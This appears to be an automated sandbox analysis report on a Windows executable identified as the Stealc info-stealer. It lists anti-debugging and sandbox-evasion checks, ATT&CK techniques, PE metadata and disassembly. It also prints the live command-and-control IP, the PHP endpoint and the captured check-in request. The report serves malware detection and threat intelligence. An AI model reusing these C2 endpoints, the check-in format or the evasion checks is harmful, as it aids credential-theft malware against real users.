                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B7DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00B7BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B71160 GetSystemInfo,ExitProcess,0_2_00B71160
                Source: file.exe, file.exe, 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1485394788.0000000000961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1485394788.0000000000995000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarev
                Source: file.exe, 00000000.00000002.1485394788.0000000000995000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?
                Source: file.exe, 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13810
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13813
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13828
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13863
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13824
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B745C0 VirtualProtect ?,00000004,00000100,000000000_2_00B745C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B89860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B89860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B89750 mov eax, dword ptr fs:[00000030h]0_2_00B89750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B878E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00B878E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1212, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B89600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00B89600
                Source: file.exe, file.exe, 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %*Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00B87B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B87980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00B87980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B87850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00B87850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B87A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00B87A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.b70000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1445038311.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1212, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.b70000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1445038311.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1212, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe42%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpNfile.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37ofile.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpBfile.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/efile.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpvfile.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37(file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.phpZfile.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1524978
                              Start date and time:2024-10-03 14:47:03 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 8s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 88
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947124810092633
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'870'848 bytes
                              MD5:0c648c4dfca774a2f1d5204ac06ac5e0
                              SHA1:0a095f75ca3115203ccee6f839e284ee6bb361d2
                              SHA256:c942c65b0db11adce8f7bded91a98d91e9c236a47cab99ea49d89acdb020c734
                              SHA512:ceadaf5756c9a6dae716bd90e3617867299e9fc066441d1ccd488f632cf2874200457a3444befb863dbb4a90c8029790a2e9cb49b99270675cf765f1814382b8
                              SSDEEP:49152:TC95AamAlPHS4kPYpo+n1EPhpl6xI0SsA:29pRHRkD+Gp87Y
                              TLSH:79853374A9E9A4B2DC9D4D78D8F0871D36A222458EAA1724C518F27E1C3C67DFF2CC49
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xaa8000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007FB95924B64Ah
                              punpckhdq mm3, qword ptr [eax+eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007FB95924D645h
                              add byte ptr [ebx], cl
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+0Ah], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or dword ptr [eax+00000000h], eax
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 00h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edx], ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edi], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], dh
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+eax], ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              and dword ptr [eax], eax
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or dword ptr [eax+00000000h], eax
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x22800d6c28ec4e5663db5eda01c271ecc8c68unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2a60000x2007f730211bf16579e65607a2c2c3d2738unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              vsethdti0x5040000x1a30000x1a2800c32e42a715033bef2f5dad4f27cb03b7False0.9948937565337514data7.953545786264284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              ypmwblrh0x6a70000x10000x600dfa8492b9d4c77a21e52d05c1c703126False0.552734375data4.866178838614331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x6a80000x30000x2200551408a43224efdf482d0b555b2720e2False0.07697610294117647DOS executable (COM)1.0141209618416407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-03T14:48:04.999687+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.849704185.215.113.3780TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 3, 2024 14:48:03.919291973 CEST4970480192.168.2.8185.215.113.37
                              Oct 3, 2024 14:48:03.953511953 CEST8049704185.215.113.37192.168.2.8
                              Oct 3, 2024 14:48:03.953628063 CEST4970480192.168.2.8185.215.113.37
                              Oct 3, 2024 14:48:03.953809977 CEST4970480192.168.2.8185.215.113.37
                              Oct 3, 2024 14:48:04.002850056 CEST8049704185.215.113.37192.168.2.8
                              Oct 3, 2024 14:48:04.748445034 CEST8049704185.215.113.37192.168.2.8
                              Oct 3, 2024 14:48:04.748589993 CEST4970480192.168.2.8185.215.113.37
                              Oct 3, 2024 14:48:04.751244068 CEST4970480192.168.2.8185.215.113.37
                              Oct 3, 2024 14:48:04.757786036 CEST8049704185.215.113.37192.168.2.8
                              Oct 3, 2024 14:48:04.999599934 CEST8049704185.215.113.37192.168.2.8
                              Oct 3, 2024 14:48:04.999686956 CEST4970480192.168.2.8185.215.113.37
                              Oct 3, 2024 14:48:07.249784946 CEST4970480192.168.2.8185.215.113.37

                              HTTP Request Dependency Graph

                              • 185.215.113.37

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.849704185.215.113.37801212C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Oct 3, 2024 14:48:03.953809977 CEST89OUTGET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Oct 3, 2024 14:48:04.748445034 CEST203INHTTP/1.1 200 OK
                              Date: Thu, 03 Oct 2024 12:48:04 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Oct 3, 2024 14:48:04.751244068 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKF
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 38 38 37 41 32 37 32 31 42 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 2d 2d 0d 0a
                              Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="hwid"3887A2721B951117388365------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="build"doma------AKFIDHDGIEGCAKFIIJKF--
                              Oct 3, 2024 14:48:04.999599934 CEST210INHTTP/1.1 200 OK
                              Date: Thu, 03 Oct 2024 12:48:04 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:0
                              Start time:08:48:00
                              Start date:03/10/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xb70000
                              File size:1'870'848 bytes
                              MD5 hash:0C648C4DFCA774A2F1D5204AC06AC5E0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1445038311.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

